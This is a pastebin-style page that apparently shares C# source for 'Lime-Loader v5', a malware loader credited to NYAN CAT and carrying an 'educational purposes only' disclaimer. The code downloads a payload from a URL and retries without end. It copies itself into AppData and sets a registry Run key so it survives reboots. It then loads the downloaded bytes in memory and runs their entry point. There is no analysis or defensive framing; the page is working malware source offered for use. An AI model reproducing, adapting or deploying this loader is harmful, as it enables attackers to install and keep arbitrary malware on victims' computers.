sei

SUBMITTED BY: emmek

DATE: April 8, 2022, 2:33 p.m.

FORMAT: C#

SIZE: 3.6 kB

Raw Download

HITS: 16305

Report
  1. using System;
  2. using System.IO;
  3. using System.Net;
  4. using System.Diagnostics;
  5. using System.Reflection;
  6. using System.Threading;
  7. using Microsoft.Win32;
  10. // │ Author : NYAN CAT
  11. // │ Name : Lime-Loader v5
  12. // │ Contact : https://github.com/NYAN-x-CAT
  14. // This program is distributed for educational purposes only.
  17. namespace Lime_Loader
  18. {
  19. class Program
  20. {
  23. public static void Main()
  24. {
  26. byte[] payloadBuffer = DownloadPayload(@"http://127.0.0.1/malware.exe");
  28. if (InstallPayload(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\payload.exe"))
  29. Environment.Exit(0);
  30. else
  31. RunPayload(payloadBuffer);
  32. }
  35. private static bool InstallPayload(string dropPath)
  36. {
  37. if (!Process.GetCurrentProcess().MainModule.FileName.Equals(dropPath, StringComparison.CurrentCultureIgnoreCase))
  38. {
  39. FileStream FS = null;
  40. try
  41. {
  42. if (!File.Exists(dropPath))
  43. FS = new FileStream(dropPath, FileMode.CreateNew);
  44. else
  45. FS = new FileStream(dropPath, FileMode.Create);
  46. byte[] loaderBuffer = File.ReadAllBytes(Process.GetCurrentProcess().MainModule.FileName);
  47. FS.Write(loaderBuffer, 0, loaderBuffer.Length);
  48. FS.Dispose();
  49. Registry.CurrentUser.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run\").SetValue(Path.GetFileName(dropPath), dropPath);
  50. Process.Start(dropPath);
  51. return true;
  52. }
  53. catch
  54. {
  55. return false;
  56. }
  57. }
  58. return false;
  59. }
  62. private static byte[] DownloadPayload(string url)
  63. {
  64. redownload:
  65. try
  66. {
  67. HttpWebRequest httpRequest = (HttpWebRequest)WebRequest.Create(url);
  68. httpRequest.Method = WebRequestMethods.Http.Get;
  69. HttpWebResponse httpResponse = (HttpWebResponse)httpRequest.GetResponse();
  70. Stream httpResponseStream = httpResponse.GetResponseStream();
  72. using (MemoryStream memoryStream = new MemoryStream())
  73. {
  74. httpResponseStream.CopyTo(memoryStream);
  75. httpResponse.Close();
  76. httpResponseStream.Dispose();
  77. return memoryStream.ToArray();
  78. }
  79. }
  80. catch
  81. {
  82. Thread.Sleep(5000);
  83. goto redownload;
  84. }
  86. }
  89. private static void RunPayload(byte[] payload)
  90. {
  91. new Thread(() =>
  92. {
  93. try
  94. {
  95. Assembly asm = AppDomain.CurrentDomain.Load(payload);
  96. MethodInfo Metinf = asm.EntryPoint;
  97. object InjObj = asm.CreateInstance(Metinf.Name);
  98. object[] parameters = new object[1]; // C#
  99. if (Metinf.GetParameters().Length == 0)
  100. {
  101. parameters = null; // VB.NET
  102. }
  103. Metinf.Invoke(InjObj, parameters);
  104. }
  105. catch { }
  106. })
  107. { IsBackground = false }.Start();
  108. }
  111. }
  112. }
comments powered by Disqus